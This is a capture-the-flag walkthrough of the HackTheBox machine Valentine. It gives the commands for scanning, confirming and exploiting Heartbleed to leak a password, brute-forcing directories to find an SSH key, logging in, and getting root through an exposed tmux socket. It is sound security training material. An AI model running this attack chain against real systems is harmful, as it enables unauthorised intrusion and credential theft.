Valentine HackTheBox WalkThrough

This is Valentine HackTheBox machine walkthrough and is also the 19th machine of our OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to Valentine HackTheBox machine. Before diving into the hacking part let us know something about this box. It is a Linux OS machine with IP address 10.10.10.79 and difficulty easy assigned by its maker.

Since this machine is retired on HackTheBox platform so you will require VIP subscription at hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP address 10.10.10.79. If all goes correct then start hacking. As usual I started by scanning the machine with Nmap. Scanning gives us some idea on how we have to proceed further. Like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -sV -oA nmap/valentine 10.10.10.79

Nmap found ports 22, 80 and 443 as open. OpenSSH 5.9p1 on port 22, apache2 web server on port 80 and apache2 over SSL on port 443 are running. Also nmap script ssl-cert found a subdomain valentine.htb. So before visiting the website at URL http://10.10.10.79 let us add the subdomain valentine.htb to the hosts file of our machine. If virtual hosting is enabled then we should have another website to enumerate on. The hosts file is present in the directory /etc/.

Hosts File After Modification

$ cat /etc/hosts

After going to URL http://valentine.htb found an image of a yelling girl with Heartbleed vulnerability symbol. This bleeding heart is giving us hint that this website is vulnerable to Heartbleed exploit. If you don’t know about Heartbleed vulnerability then check this official link of the company who has first discovered this vulnerability and given name & symbol to it.

Let us confirm whether this machine is actually vulnerable to Heartbleed vulnerability or not. There are multiple ways by which we can confirm this vulnerability. You can either use nmap script ssl-heartbleed.nse or metasploit scanner module auxiliary/scanner/ssl/openssl_heartbleed or some other GitHub tools. There are a lot present on GitHub. Just google Heartbleed exploit GitHub and you have a number of tools available to use. I have used nmap script and metasploit module both to confirm this vulnerability.

Confirming Heartbleed Vulnerability using Nmap Script

$ nmap -p 443 --script ssl-heartbleed.nse 10.10.10.79

Confirming Heartbleed Vulnerability using Metasploit

msf6 > search openssl_heartbleed

msf6 > use auxiliary/scanner/ssl/openssl_heartbleed

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 10.10.10.79

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RPORT 443

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action SCAN

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

Both the above methods revealed that this Valentine machine is vulnerable to Heartbleed exploit. Let us exploit this vulnerability to check what information is being leaked from the memory of valentine machine. I have used this GitHub tool. You can also use some other tool for this task.

Exploiting Heartbleed Vulnerability

$ git clone https://gist.github.com/eelsivart/10174134

$ cd 10174134/

$ python heartbleed.py 10.10.10.79

Exploitation revealed some base64 encoded text. After decoding it I found heartbleedbelievethehype. Don’t know exactly what it is, may be it is someone’s password! Anyway, added it to my cherry tree notes. It will be helpful for us when we find some username to check to login in it’s SSH account.

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==: heartbleedbelievethehype

$ echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg=='| base64 -d

After some more enumeration at URL https://valentine.htb when I could not find anything interesting then I tried to directory bruteforce using $dirsearch (a directory brute forcer written in python) with its default wordlist.

$ sudo dirsearch -e all -t 30 -x 400,403 -u https://valentine.htb | tee dirsearch.out

Directory bruteforcing revealed dev folder. After accessing this folder at URL https://valentine.htb/dev/ found hype_key in hex encoded form. The key can be accessed at the URL https://valentine.htb/dev/hype_key.

Let us decode this key.

After decoding it we found SSH Private Key. Then I copied it in a file hype_key.pem. It appears that this SSH key is of user hype (a/c to its name). When I tried to SSH into hype account using this key and password which we have noted in our cherry tree I could easily logged in. So here our SSH cred is hype: heartbleedbelievethehype.

Getting User Shell

$ vi hype_key.pem

$ chmod 400 hype_key.pem

$ ssh -i hype_key.pem [email protected]

~heartbleedbelievethehype

hype@Valentine:~$ whoami && id

We have successfully got user shell. Let us capture user flag.

Capture User Flag

$ cat Desktop/user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script). Linpeas finds all the potential vector (path) that can be used to escalate privilege.

Finding PrivEsc Vector

Linpeas found a tmux session that can be used to escalate privilege. When I tried to execute $/usr/bin/tmux -S /.devs/dev_sess command I could easily get root shell in tmux. So here our Privilege Escalation vector is getting root shell by using root tmux session.

Getting Root Shell

$ /usr/bin/tmux -S /.devs/dev_sess

Capture Root Flag

# cat /root/root.txt

This was how I rooted to Valentine HackTheBox machine. Hope you have got something to learn from this machine walkthrough. Feel free to ask your doubt in the comment section if you face any. Thanks for reading this article. For any query and suggestion related to walkthrough feel free to contact us at [email protected].